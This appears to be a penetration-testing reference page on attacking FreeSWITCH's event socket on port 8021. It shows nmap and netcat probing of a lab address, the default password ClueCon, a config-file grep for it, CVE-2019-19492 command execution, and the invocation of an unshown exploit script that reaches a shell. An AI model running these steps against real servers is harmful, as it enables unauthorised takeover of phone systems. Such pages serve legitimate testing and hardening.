8021 - FreeSWITCH
FreeSWITCH is an open-source VoIP platform commonly used for PBX systems, SIP trunking, and conferencing services. The mod_event_socket module in FreeSWITCH opens a TCP socket, typically on port 8021, which allows external applications to communicate with the switch using a command/response protocol.
This interface should never be exposed externally without robust access controls. If an attacker guesses or knows the event_socket_password, which defaults to ClueCon in many installations, they can authenticate and issue commands to the FreeSWITCH server. With successful authentication, an attacker could list and manage calls, inject audio or messages, execute arbitrary dial plans, and potentially escalate privileges further depending on the system's configuration.
Enumeration
# TCP scan with nmap
PORT STATE SERVICE VERSION
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
# Manual service probing
$ nc -nv 192.168.244.151 8021
(UNKNOWN) [192.168.244.151] 8021 (zope-ftp) open
Content-Type: auth/request
...
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
Upon probing with nc, the connection to the port succeeds and returns the message Content-Type: auth/request, indicating that FreeSWITCH is prompting for a password. Authentication is usually performed using the command auth <password>. If the password is correct, the server responds with Content-Type: command/reply Reply-Text: +OK accepted.
Attacks
# Check default credentials
$ creds search freeswitch
+------------+----------+----------+
| Product | username | password |
+------------+----------+----------+
| freeswitch | <blank> | ClueCon |
+------------+----------+----------+
FreeSWITCH versions 1.6.10 through 1.10.1 are vulnerable to RCE (CVE-2019-19492) due to a hardcoded default password (ClueCon) in the event_socket.conf.xml file. If unchanged, this allows remote attackers to authenticate to the Event Socket interface and execute arbitrary system commands through the FreeSWITCH service, making it a critical entry point for compromising VoIP infrastructure.
The default configuration files for FreeSWITCH are under /etc/freeswitch/autoload_configs/:
# Recursive, case-insensitive search
$ grep -Ri password
$ cat event_socket.conf.xml | grep password
<param name="password" value="ClueCon"/>
This PoC allows easy exploitation of the above vulnerability:
$ uv run exploit.py --target <target>
# id